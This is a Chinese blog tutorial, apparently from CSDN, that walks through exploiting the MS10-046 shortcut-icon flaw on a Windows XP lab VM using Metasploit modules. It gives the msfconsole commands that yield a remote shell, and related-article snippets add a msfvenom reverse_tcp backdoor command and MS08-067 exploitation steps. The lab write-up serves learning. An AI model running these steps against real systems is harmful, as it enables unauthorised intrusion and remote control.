使用ms10_046对xp系统进行渗透

最新推荐文章于 2023-10-27 10:58:39 发布
最新推荐文章于 2023-10-27 10:58:39 发布
阅读量2.3k 收藏 17
点赞数
分类专栏: kali 文章标签: ms10_046 kali msfconsole
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaopan233/article/details/82818155
版权

本实验在虚拟机环境下进行!!!

准备:

Kali 192.168.88.105

Xp  192.168.88.106 

这个是一个图标漏洞,所以我们只需要设置好参数,等待靶机访问即可

进入msfconsole

search  ms10_046 查找相应的模块

这里可以看到,有两个可用于攻击的模块,但一个是browser一个是smb,我们先试试browser的行不行

使用模块

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

查看可以渗透的目标

show targets

看到是Automatic,说明都可以

查看选项参数

show options

可以看到,默认已经把参数设置好了,我们只管run即可

 

run执行

可以看到,他说发送了客户端在\\192.168.88.105\LNivjPN\这个地址上

我们用xp来访问一下

就两个看起来与世无争的小东西

但我们的kali涌出了大量信息

 

那么大一段字不重要,重要的是箭头所指处,session会话已经建立

我们sessions来看看现在建立了那些会话

可以看到,sessions列表中已经有了我们的xp了

我们用sessions -i 1来连接xp

可以看到,已经连接成功了

 我们使用shell来获取xp的shell

看到命令提示符已经变成了window下的cmd了,说明渗透成功

再试试另一个模块可不可以

use exploit/windows/smb/ms10_046_shortcut_icon_dllloader

 

run 执行

可以看到,它说要去访问\\192.168.88.105\WUMiC\EbWWhz.dll这个路径

我们进入xp,进行访问

打开方式选记事本,可以看到,kali那里返回了信息

他说那个lnk文件也必须被发送

这个两个文件分开的,不太好弄,不如上一个模块。所以我们ctrl+c停止运行,不使用这个模块了。。。

xiaopan233
关注
专栏目录
渗透测试winxp
qq_45088344的博客
05-24 380
测试环境 同一网段下的kali linux(192.168.5.133)和windows xp 信息收集 用nmap搜索目标机 nmap -sn 192.168.5.0/24 创建后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.133 lport=4444 -f exe > upgrade.exe 创建后门程序后在终端输入msfconsole启动Metasploit设置以下配置 use explo.
利用metasploit通过ms_08_067_netapi漏洞渗透winXp
cool_jia的博客
12-19 2618
攻击主机为装了metasploit的win10 目标主机为虚拟机中的winxp专业版sp3(需要关闭防火墙) 虚拟机中系统采用的桥接方式 1.启动metasploit 2.使用ms_08_067_netapi渗透模块,并查看信息 3.查看可用的攻击载荷 4.选择攻击载荷generic/shell_bind_tcp(此处就是要获取对方的控制台),查看有哪些参数要设置 5
Metasploit的攻击实例讲解----ms10_046快捷方式图标漏洞
weixin_33907511的博客
05-19 840
    不多说,直接上干货!   准备工具 1、Kali linux 2016.2(Rolling)系统  IP:  192.168.1.103 2、受害者机子(windows XP系统)   IP:  10.10.10.1.102 3、使用工具 msfconsole       步骤: 1、进入控制台   root@kali:~# msfconsole ...
kali渗透windowsXP过程
dfdhxb995397的博客
05-23 1021
文章来源i春秋 这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图 更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1...
使用MSF 利用 ms08_067 对 XP 进行渗透
枫梓林のBlog
04-21 2278
利用 ms08_067 对 XP 进行渗透 文章目录利用 ms08_067 对 XP 进行渗透一、项目要求二、项目实施1. 实施目标2. 实施方案2.1 扫描该网段存活的主机2.2 使用nmap 判断目标主机IP地址2.3 使用 nessus 扫描该系统漏洞2.4 使用 Metasploit 对 XP 进行渗透三、总结 一、项目要求 渗透XP系统系统中执行几条命令 二、项目实施 1. 实施目标 使用工具寻找目标内存活的主机 使用工具,判断其操作系统,及相关信息收集 扫描该系统的漏洞,进行
利用ms08_067对XP进行渗透
xiaopangding09的博客
06-01 607
简单记录以下之前写过的一次作业,权当复习一下。 1.什么是ms08_067? MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。 说明:微软安全公告KB958644 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 发布日期:2008/10/22 下载大小:因操作系统而异。 受影响的操作系统: Windows 2000;XP;Ser
Kali利用msfMS10_061漏洞进行渗透测试
venu_s的博客
12-27 7078
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
找到合适的模块后,加载该模块,如`use exploit/windows/local/ms10_046_lnk`。 4. **配置参数**:根据目标环境设置模块参数,例如目标IP地址、端口、payload等。payload是你要在目标系统上执行的代码,例如创建一...
浏览器攻击渗透ms10-018:需要版本较低的xp系统可以成功
weixin_46248422的博客
06-23 327
1. msf6 > search ms10-018 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- .
metasploit 框架之利用 ms08_067 漏洞渗透Windows XP SP3 Chinese - Simplified (NX)实验过程及错误处理
热门推荐
max_ii_min的博客
02-18 2万+
1:渗透目标 查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。 2:准备阶段 2.1软件 Kali linux (链接:https://pan.baidu.com/s/1b3eE0c8vNPqGWMzWoLZhpw 提取码:siud) Windows XP SP3 Chinese - Simplified (NX)(链接:https://p...
Windows XP SP3 Chinese - Simplified (NX)渗透详细解析
qq_74378387的博客
10-27 564
攻击机:kali靶机:Windows XP SP3 Chinese - Simplified (NX)
Ms08-067渗透win xp 之路
meditate的博客
03-19 810
Ms08-067渗透win xp 之路 一·进入msf框架 命令:msfconsole 二·查找ms08-067漏洞 命令:search ms08-067 三·使用攻击模块 命令:use xxxxxxxxxxx 四·查看所需要配置的参数 命令:show options 五·配置必要参数 命令:set RHOSTS 192.168.0.25 六·查看攻击模块支持攻击的系统 命令show ...
ms10_046_shortcut_icon_dllloader 这个其实很好用
爱杀之爪的矩阵
04-08 3771
域环境渗透以及域控窃权(攻陷Winows XP SP2篇、二)
qq_43093288的博客
04-09 562
环境:kali、wdinwos xp、wdinwos xp、Windows Server 2003 R2。
使用Metasploit对WindowsXP渗透测试
panfengblog
11-17 1406
使用Metasploit对WindowsXP渗透测试 哇,见识到了,渗透好猛 _ (大佬勿喷,我是菜鸡QAQ) 1. 破解用户口令 在我们使用漏洞渗透拿到windows的系统权限(system权限)时,就可以使用用hashdump或者scraper脚本获取用户口令hash辣~~ 可以通过hash碰撞的方式获得口令明文,或者直接使用mimikatz获得口令明文(当然是选择mimikatz更快鸭!) 2. 权限提升 参考博客:点我:-) 我们需要先拿到一个权限受限的shell鸭(比如使用ms10-0
kali渗透windowsXP过程__DNS欺骗
box
09-20 590
DNS欺骗
渗透测试——XP工具练习
weixin_34380296的博客
07-24 188
1、今天主要是练习目录扫描工具 意义:随着视野不断加深,发现普通的工具再也无法扫描出web的管理后台,谷歌的搜索引擎也无法找出管理后台。 网站的后台扫描的障碍: 1、robot.txt 文件屏蔽了一些重要的文件,也可能是一些不重要的文件,根据社工的心理分析,这个文件中的东西肯定是会有一定的迷惑性的,使得依靠搜索引擎无法搜索到我们想要的后台。 2、工具的字典太小了,容纳不了万千程序员的命名法...
kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
安全参透之旅
12-18 3488
攻击实例讲解-ms10_046快捷方式图标漏洞   准备工具 1、kali系统 IP:10.10.10.131 2、受害者机子 IP:10.10.10.129 3、使用工具 msfconsole   步骤: 1、进入控制台 root@kali:~# msfconsole                                                      
渗透测试目标Windows XP SP1之360程序分享
kalilinux2的博客
08-03 911
渗透测试目标Windows XP SP1之360程序分享
BT5利用ms12_004_midi漏洞的Win7渗透教程:Metasploit实战
首先,我们设定了一个实验环境,包括在Windows 7系统上通过VMware搭建的虚拟机,其中BT5作为攻击者机器,IP地址为192.168.247.131,而XP系统作为目标机器,IP地址为192.168.247.134,浏览器版本为过时的IE6.0。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值